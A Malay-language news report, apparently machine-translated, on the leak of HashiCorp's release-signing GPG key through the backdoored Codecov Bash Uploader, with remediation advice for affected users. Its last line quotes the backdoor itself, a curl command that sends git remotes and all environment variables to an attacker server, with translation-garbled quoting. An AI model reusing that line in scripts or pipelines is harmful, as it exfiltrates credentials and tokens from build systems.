HashiCorp, terkenal kerana membangunkan alatan sumber terbuka Vagrant, Packer, Nomad dan Terraform, mengumumkan kebocoran kunci GPG peribadi yang digunakan untuk mencipta tandatangan digital yang mengesahkan keluaran. Penyerang yang mendapat akses kepada kunci GPG berpotensi membuat perubahan tersembunyi pada produk HashiCorp dengan mengesahkannya dengan tandatangan digital yang betul. Pada masa yang sama, syarikat itu menyatakan bahawa semasa audit, tiada kesan percubaan untuk membuat pengubahsuaian tersebut dikenal pasti.
Pada masa ini, kunci GPG yang terjejas telah dibatalkan dan kunci baharu telah diperkenalkan sebagai gantinya. Masalah ini hanya menjejaskan pengesahan menggunakan fail SHA256SUM dan SHA256SUM.sig, dan tidak menjejaskan penjanaan tandatangan digital untuk pakej Linux DEB dan RPM yang dibekalkan melalui releases.hashicorp.com, serta mekanisme pengesahan keluaran untuk macOS dan Windows (AuthentiCode) .
Kebocoran berlaku disebabkan penggunaan skrip Codecov Bash Uploader (codecov-bash) dalam infrastruktur, yang direka untuk memuat turun laporan liputan daripada sistem penyepaduan berterusan. Semasa serangan ke atas syarikat Codecov, pintu belakang telah disembunyikan ke dalam skrip yang ditentukan, yang melaluinya kata laluan dan kunci penyulitan dihantar ke pelayan penyerang.
Untuk menggodam, penyerang mengambil kesempatan daripada ralat dalam proses mencipta imej Codecov Docker, yang membenarkan mereka mengekstrak data akses kepada GCS (Google Cloud Storage), yang diperlukan untuk membuat perubahan pada skrip Bash Uploader yang diedarkan daripada codecov.io laman web. Perubahan itu dibuat semula pada 31 Januari, kekal tidak dapat dikesan selama dua bulan dan membenarkan penyerang mengekstrak maklumat yang disimpan dalam persekitaran sistem penyepaduan berterusan pelanggan. Menggunakan kod hasad tambahan, penyerang boleh mendapatkan maklumat tentang repositori Git yang diuji dan semua pembolehubah persekitaran, termasuk token, kunci penyulitan dan kata laluan yang dihantar kepada sistem penyepaduan berterusan untuk mengatur akses kepada kod aplikasi, repositori dan perkhidmatan seperti Perkhidmatan Web Amazon dan GitHub.
Selain panggilan langsung, skrip Pemuat Naik Codecov Bash telah digunakan sebagai sebahagian daripada pemuat naik lain, seperti Codecov-action (Github), Codecov-circleci-orb dan Codecov-bitrise-step, yang penggunanya turut terjejas oleh masalah tersebut. Semua pengguna codecov-bash dan produk berkaitan disyorkan untuk mengaudit infrastruktur mereka, serta menukar kata laluan dan kunci penyulitan. Anda boleh menyemak kehadiran pintu belakang dalam skrip dengan kehadiran baris curl -sm 0.5 -d β$(git remote -v)<<<<<< ENV $(env)β http:// /upload/v2 || benar
Sumber: opennet.ru